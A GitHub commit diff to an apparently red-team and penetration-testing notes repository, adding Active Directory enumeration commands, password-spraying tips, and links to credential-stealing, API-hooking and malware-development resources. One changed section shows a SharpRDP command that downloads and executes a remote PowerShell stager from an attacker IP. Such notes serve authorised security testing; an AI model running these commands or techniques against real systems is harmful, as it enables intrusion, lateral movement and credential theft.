[AHK] Automatic update 👽

Meditology · Jun 11, 2022 · 833b464 · 833b464
1 parent eec6b3f
commit 833b464
Show file tree

Hide file tree

Showing 13 changed files with 152 additions and 14 deletions.
diff --git a/SUMMARY.md b/SUMMARY.md
@@ -52,6 +52,7 @@
       - [Unconstrained](pentest/infrastructure/ad/delegation-abuse/kud.md)
     * [Discovery](pentest/infrastructure/ad/discovery.md)
     * [DnsAdmins](pentest/infrastructure/ad/dnsadmins.md)
+    * [Dominance](pentest/infrastructure/ad/dominance.md)
     * [GPO Abuse](pentest/infrastructure/ad/gpo-abuse.md)
     * [Kerberos](pentest/infrastructure/ad/kerberos/README.md)
       - [Kerberos Relay](pentest/infrastructure/ad/kerberos/kerberos-relay.md)
@@ -73,7 +74,6 @@
       - [NTLM Relay](pentest/infrastructure/ad/ntlm/ntlm-relay.md)
       - [NTLMv1 Downgrade](pentest/infrastructure/ad/ntlm/ntlmv1-downgrade.md)
     * [Password Spraying](pentest/infrastructure/ad/password-spraying.md)
-    * [Dominance](pentest/infrastructure/ad/dominance.md)
     * [Post Exploitation](pentest/infrastructure/ad/post-exploitation.md)
     * [PrivExchange](pentest/infrastructure/ad/privexchange.md)
     * [Privileges Abuse](pentest/infrastructure/ad/privileges-abuse/README.md)
@@ -175,6 +175,7 @@
     * [Process Hollowing](redteam/maldev/code-injection/process-hollowing.md)
     * [Process Injectors](redteam/maldev/code-injection/process-injectors.md)
     * [Shellcode Runners](redteam/maldev/code-injection/shellcode-runners.md)
+  - [API Hooking](redteam/maldev/api-hooking.md)
   - [D/Invoke](redteam/maldev/dinvoke.md)
   - [Nim](redteam/maldev/nim.md)
   - [Shellcodes](redteam/maldev/shellcodes.md)

diff --git a/pentest/infrastructure/ad/README.md b/pentest/infrastructure/ad/README.md
@@ -158,7 +158,7 @@ MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETU
 
 {% embed url="https://youtu.be/o3W4H0UfDmQ" %}
 
-There're 2 global dicts in JSON files: `data` and `meta`. We need `data`:
+There're 2 global dicts in JSON files: `data` and `meta`. We care about `data`:
 
 ```json
 $ cat 20220604031239_users.json | jq '. | keys'
@@ -186,13 +186,13 @@ List user accounts whose passwords were set after their last logon (an effective
 cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .pwdlastset > .lastlogontimestamp) | .name + " :: " + (.lastlogontimestamp | tostring)' -r
 ```
 
-List user accounts with `DoesNotRequirePreAuth` set ([asreproastable](/pentest/infrastructure/ad/roasting.md#asreproasting)):
+List user accounts with `DoesNotRequirePreAuth` set (aka [asreproastable](/pentest/infrastructure/ad/roasting.md#asreproasting)):
 
 ```
 cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .dontreqpreauth == true) | .name' -r
 ```
 
-List user accounts with SPN(s) set ([kerberoastable](/pentest/infrastructure/ad/roasting.md#kerberoasting))
+List user accounts with SPN(s) set (aka [kerberoastable](/pentest/infrastructure/ad/roasting.md#kerberoasting))
 
 ```
 cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .serviceprincipalnames != []) | .name + " :: " + (.serviceprincipalnames | join(","))' -r
@@ -204,18 +204,30 @@ List computer accounts' operating system names:
 cat 20220604031239_computers.json | jq '.data[].Properties | .name + " :: " + .operatingsystem' -r
 ```
 
-Recursively list all members of a group ([script](https://github.com/penetrarnya-tm/WeaponizeKali.sh/blob/main/misc/get_ad_group_member.py)):
+Recursively list all members of a group (mimics RSAT `Get-ADGroupMember`, [script](https://github.com/penetrarnya-tm/WeaponizeKali.sh/blob/main/misc/get_ad_group_member.py)):
 
 ```
+$ ls
+20220604043009_computers.json  20220604043009_groups.json  20220604043009_users.json
 $ python3 get_ad_group_member.py 'DOMAIN [email protected]'
 ```
 
-Recursively list all groups which the user is a member of ([script](https://github.com/penetrarnya-tm/WeaponizeKali.sh/blob/main/misc/get_ad_user_memberof.py)):
+Recursively list all groups which the user is a member of (mimics RSAT `Get-ADUser | select memberof`, [script](https://github.com/penetrarnya-tm/WeaponizeKali.sh/blob/main/misc/get_ad_user_memberof.py)):
 
 ```
+$ ls
+20220604043009_groups.json  20220604043009_users.json
 $ python3 get_ad_user_memberof.py '[email protected]'
 ```
 
+Generate a `.csv` file containing AD trusts mapping to be used in [TrustVisualizer](https://github.com/snovvcrash/TrustVisualizer) (mimics PowerView `Get-DomainTrustMapping`, [script](https://github.com/penetrarnya-tm/WeaponizeKali.sh/blob/main/misc/get_domain_trust_mapping.py)):
+
+```
+$ ls
+20220604043009_domains.json
+$ python3 get_domain_trust_mapping.py
+```
+
 
 
 ### PowerView / SharpView
@@ -475,6 +487,7 @@ Detect stale, unused or fake computer accounts based on password age (replace `-
 $date = [DateTime]::Today.AddDays(-90); Get-ADComputer -Filter '(Enabled -eq $true) -and (PasswordLastSet -le $date)' | select Name
 ```
 
-Administrative Tier Model explained:
+Administrative Tier Model & Microsoft RaMP (Zero Trust **Ra**pid **M**odernization **P**lan):
 
 * [https://security-tzu.com/2020/03/23/mitigate-credential-theft-with-administrative-tier-model/](https://security-tzu.com/2020/03/23/mitigate-credential-theft-with-administrative-tier-model/)
+* [https://www.secframe.com/ramp/](https://www.secframe.com/ramp/)
diff --git a/pentest/infrastructure/ad/authentication-coercion.md b/pentest/infrastructure/ad/authentication-coercion.md
@@ -189,6 +189,7 @@ $ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megaco
 ### Mitigation
 
 - [https://kb.cert.org/vuls/id/405600](https://kb.cert.org/vuls/id/405600)
+- [https://github.com/zeronetworks/rpcfirewall](https://github.com/zeronetworks/rpcfirewall)
 
 
 

diff --git a/pentest/infrastructure/ad/credentials-dump/rdp.md b/pentest/infrastructure/ad/credentials-dump/rdp.md
@@ -10,6 +10,8 @@ description: Remote Desktop Protocol
 ## RdpThief
 
 * [https://github.com/0x09AL/RdpThief](https://github.com/0x09AL/RdpThief)
+* [https://github.com/S3cur3Th1sSh1t/RDPThiefInject](https://github.com/S3cur3Th1sSh1t/RDPThiefInject)
+* [https://github.com/snovvcrash/SharpRdpThief](https://github.com/snovvcrash/SharpRdpThief)
 * [https://github.com/passthehashbrowns/SharpRDPThief](https://github.com/passthehashbrowns/SharpRDPThief)
 * [https://github.com/proxytype/RDP-THIEF](https://github.com/proxytype/RDP-THIEF)
 

diff --git a/pentest/infrastructure/ad/lateral-movement/README.md b/pentest/infrastructure/ad/lateral-movement/README.md
@@ -6,3 +6,4 @@
 - [https://xakep.ru/2020/11/16/lateral-guide/](https://xakep.ru/2020/11/16/lateral-guide/)
 - [https://docs.microsoft.com/en-us/defender-for-identity/playbook-lateral-movement](https://docs.microsoft.com/en-us/defender-for-identity/playbook-lateral-movement)
 - [https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)
+- [https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/reference-tools-logon-types](https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/reference-tools-logon-types)
diff --git a/pentest/infrastructure/ad/lateral-movement/rdp.md b/pentest/infrastructure/ad/lateral-movement/rdp.md
@@ -71,10 +71,21 @@ PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\termin
 
 
 
-## SharpRDP
+## Tools
 
-* [https://github.com/0xthirteen/SharpRDP](https://github.com/0xthirteen/SharpRDP)
+
+
+### SharpRDP
+
+- [https://github.com/0xthirteen/SharpRDP](https://github.com/0xthirteen/SharpRDP)
+- [https://github.com/S3cur3Th1sSh1t/SharpRDP](https://github.com/S3cur3Th1sSh1t/SharpRDP)
 
 ```
 Cmd > .\SharpRDP.exe computername=srv01 command="iex(new-object net.webclient).downloadstring('http://10.10.13.37:8080/grunt.ps1')" username=megacorp\snovvcrash password=Passw0rd!
 ```
+
+
+
+### SharpRDPHijack
+
+- [https://github.com/bohops/SharpRDPHijack](https://github.com/bohops/SharpRDPHijack)
diff --git a/pentest/infrastructure/ad/ldap.md b/pentest/infrastructure/ad/ldap.md
@@ -164,13 +164,13 @@ PS > (Get-ADObject -LDAPFilter '(&(objectCategory=computer)(objectClass=computer
 PS > (Get-ADObject -LDAPFilter '(&(objectCategory=group)(objectClass=group))' | measure).count
 ```
 
-List users with `DoesNotRequirePreAuth` set ([asreproastable](/pentest/infrastructure/ad/roasting.md#asreproasting)):
+List users with `DoesNotRequirePreAuth` set (aka [asreproastable](/pentest/infrastructure/ad/roasting.md#asreproasting)):
 
 ```
 PS > Get-ADUser -Filter {DoesNotRequirePreAuth -eq "True"} -Properties DoesNotRequirePreAuth | select DoesNotRequirePreAuth,samAccountName | fl
 ```
 
-List accounts with SPN(s) set ([kerberoastable](/pentest/infrastructure/ad/roasting.md#kerberoasting)) and which are also in Protected Users group:
+List accounts with SPN(s) set (aka [kerberoastable](/pentest/infrastructure/ad/roasting.md#kerberoasting)) and which are also in Protected Users group:
 
 ```
 PS > Get-ADUser -Filter {memberOf -eq "CN=Protected Users,CN=Users,DC=MEGACORP,DC=LOCAL"} -Properties * | select samAccountName,servicePrincipalName,memberOf | fl

diff --git a/pentest/infrastructure/ad/password-spraying.md b/pentest/infrastructure/ad/password-spraying.md
@@ -9,7 +9,7 @@ Enumerate password policy in the domain:
 
 ```
 $ cme smb 10.10.13.37 -u snovvcrash -p 'Passw0rd!' --pass-pol
-Cmd > net accounts
+Cmd > net accounts /domain
 PS > Get-ADDefaultDomainPasswordPolicy
 PV3 > Get-DomainPolicyData | select -ExpandProperty SystemAccess
 ```
@@ -28,6 +28,43 @@ Example of `net accounts` output:
 
 
 
+### Fine-Grained Password Policies
+
+- [https://specopssoft.com/blog/create-fine-grained-password-policy-active-directory/](https://specopssoft.com/blog/create-fine-grained-password-policy-active-directory/)
+- [https://pwsh.ru/fine-grained-password-policy-как-создать-детальную-политику/](https://pwsh.ru/fine-grained-password-policy-как-создать-детальную-политику/)
+
+Map FGPPs to the users they're being applied to (need admin privileges by default):
+
+```powershell
+ForEach ($fgpp in (Get-ADFineGrainedPasswordPolicy -Filter * -Properties Description)) {
+    $appliesTo = $fgpp | select -ExpandProperty AppliesTo
+    $objectClass = (Get-ADObject $appliesTo).ObjectClass
+
+    Write-Host -ForegroundColor Yellow "`r`nFine Grained Password Policy: $fgpp.name"
+    $fgpp | Out-Host
+
+    If ($objectClass -eq "group") {
+        Get-ADGroupMember $appliesTo -Recursive | ? {$_.objectClass -eq "user"} | select -ExpandProperty samAccountName | Write-Host -ForegroundColor Green
+    }
+    ElseIf ($objectClass -eq "user") {
+        Get-ADUser $appliesTo | select -ExpandProperty samAccountName | Write-Host -ForegroundColor Green
+    }
+}
+```
+
+{% hint style="info" %}
+When it's critical not to cause a lockout on a user account with a FGPP applied, the safest approach would be to exclude users with `msDS-PSOApplied` or `msDS-ResultantPSO` properties populated (can be read by a regular user) from the spray list.
+
+Check if exists:
+
+```
+PS > Get-ADUser snovvcrash -Properties * | select msDS-PSOApplied
+PS > Get-ADUser snovvcrash -Properties msDS-ResultantPSO | select msDS-ResultantPSO
+```
+{% endhint %}
+
+
+
 
 ## Get Domain Users
 

diff --git a/pentest/infrastructure/networks/README.md b/pentest/infrastructure/networks/README.md
@@ -1,3 +1,5 @@
 # Network
 
-* [https://github.com/frostbits-security/MITM-cheatsheet](https://github.com/frostbits-security/MITM-cheatsheet)
+- [https://github.com/frostbits-security/MITM-cheatsheet](https://github.com/frostbits-security/MITM-cheatsheet)
+- [https://xakep.ru/author/necreas1ng/](https://xakep.ru/author/necreas1ng/)
+- [https://xakep.ru/2021/08/25/stp-yersinia/](https://xakep.ru/2021/08/25/stp-yersinia/)
diff --git a/redteam/cobalt-strike.md b/redteam/cobalt-strike.md
@@ -22,6 +22,14 @@
 
 
 
+## Community Kit
+
+- [https://cobalt-strike.github.io/community_kit/](https://cobalt-strike.github.io/community_kit/)
+- [https://github.com/penetrarnya-tm/WeaponizeKali.sh/blob/main/cs/README.md](https://github.com/penetrarnya-tm/WeaponizeKali.sh/blob/main/cs/README.md)
+
+
+
+
 ## P2P Beacons
 
 Beacon TCP and Beacon SMB are Peer-to-Peer beacons which means they're used to chain a connection to an existent beacon. They act like bind shells and waits for the attacker to connect to them.

diff --git a/redteam/maldev/README.md b/redteam/maldev/README.md
@@ -1,6 +1,5 @@
 # Malware Development
 
-- [https://0xpat.github.io/Malware_development_part_1/](https://0xpat.github.io/Malware_development_part_1/)
 - [https://threadreaderapp.com/thread/1520676600681209858.html](https://threadreaderapp.com/thread/1520676600681209858.html)
 
 [EIKAR](https://ru.wikipedia.org/wiki/EICAR-Test-File):
@@ -12,6 +11,37 @@ $ msfvenom -p windows/messagebox TITLE="EICAR" TEXT="X5O!P%@AP[4\PZX54(P^)7CC)7}
 
 
 
+## Blog Series
+
+
+
+### @0xPat
+
+- [Malware development part 1 - basics](https://0xpat.github.io/Malware_development_part_1/)
+- [Malware development part 2 - anti dynamic analysis & sandboxes](https://0xpat.github.io/Malware_development_part_2/)
+- [Malware development part 3 - anti-debugging](https://0xpat.github.io/Malware_development_part_3/)
+- [Malware development part 4 - anti static analysis tricks](https://0xpat.github.io/Malware_development_part_4/)
+- [Malware development part 5 - tips & tricks](https://0xpat.github.io/Malware_development_part_5/)
+- [Malware development part 6 - advanced obfuscation with LLVM and template metaprogramming](https://0xpat.github.io/Malware_development_part_6/)
+- [Malware development part 7 - Secure Desktop keylogger](https://0xpat.github.io/Malware_development_part_7/)
+- [Malware development part 8 - COFF injection and in-memory execution](https://0xpat.github.io/Malware_development_part_8/)
+- [Malware development part 9 - hosting CLR and managed code injection](https://0xpat.github.io/Malware_development_part_9/)
+
+
+
+### @cocomelonc
+
+- [Malware development: persistence - part 1. Registry run keys](https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html)
+- [Malware development: persistence - part 2. Screensaver hijack](https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html)
+- [Malware development: persistence - part 3. COM DLL hijack](https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html)
+- [Malware development: persistence - part 4. Windows services](https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html)
+- [Malware development: persistence - part 5. AppInit_DLLs](https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html)
+- [Malware development: persistence - part 6. Windows netsh helper DLL](https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html)
+- [Malware AV evasion: part 7. Disable Windows Defender](https://cocomelonc.github.io/tutorial/2022/06/05/malware-av-evasion-7.html)
+
+
+
+
 ## PE Injection
 
 - [https://gist.github.com/hasherezade/e6daa4124fab73543497b6d1295ece10](https://gist.github.com/hasherezade/e6daa4124fab73543497b6d1295ece10)

diff --git a/redteam/maldev/api-hooking.md b/redteam/maldev/api-hooking.md
@@ -0,0 +1,30 @@
+# API Hooking
+
+- [https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++](https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++)
+- [https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-1.html](https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-1.html)
+- [https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-2.html](https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-2.html)
+
+
+
+
+## Examples
+
+
+
+### C++
+
+- [https://github.com/mgeeky/ShellcodeFluctuation/blob/master/ShellcodeFluctuation/main.cpp](https://github.com/mgeeky/ShellcodeFluctuation/blob/master/ShellcodeFluctuation/main.cpp)
+- [https://github.com/snovvcrash/VeraCryptThief/blob/main/VeraCryptThiefDll/veracryptthief.cpp](https://github.com/snovvcrash/VeraCryptThief/blob/main/VeraCryptThiefDll/veracryptthief.cpp)
+
+
+
+### C\#
+
+- [https://gist.github.com/NaxAlpha/144d1dd96c7d0ad29fe149e4063a8f25](https://gist.github.com/NaxAlpha/144d1dd96c7d0ad29fe149e4063a8f25)
+
+
+
+
+## Tools
+
+- [https://github.com/CCob/MinHook.NET](https://github.com/CCob/MinHook.NET)
diff --git a/redteam/maldev/code-injection/README.md b/redteam/maldev/code-injection/README.md
@@ -81,6 +81,8 @@ $ gcc -o loader loader.c -z execstack
 - [https://www.solomonsklash.io/SleepyCrypt-shellcode-to-encrypt-a-running-image.html](https://www.solomonsklash.io/SleepyCrypt-shellcode-to-encrypt-a-running-image.html)
 - [https://github.com/SolomonSklash/SleepyCrypt](https://github.com/SolomonSklash/SleepyCrypt)
 - [https://github.com/mgeeky/ShellcodeFluctuation](https://github.com/mgeeky/ShellcodeFluctuation)
+- [https://github.com/phra/PEzor/blob/master/fluctuate.cpp](https://github.com/phra/PEzor/blob/master/fluctuate.cpp)
+- [https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/](https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/)
 - [https://xz.aliyun.com/t/9399](https://xz.aliyun.com/t/9399)
 - [https://github.com/zu1k/beacon_hook_bypass_memscan](https://github.com/zu1k/beacon_hook_bypass_memscan)
 - [https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html](https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html)
Original file line number	Diff line number	Diff line change
Expand Up		@@ -189,6 +189,7 @@ $ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megaco
		### Mitigation

		- [https://kb.cert.org/vuls/id/405600](https://kb.cert.org/vuls/id/405600)
		- [https://github.com/zeronetworks/rpcfirewall](https://github.com/zeronetworks/rpcfirewall)



Expand Down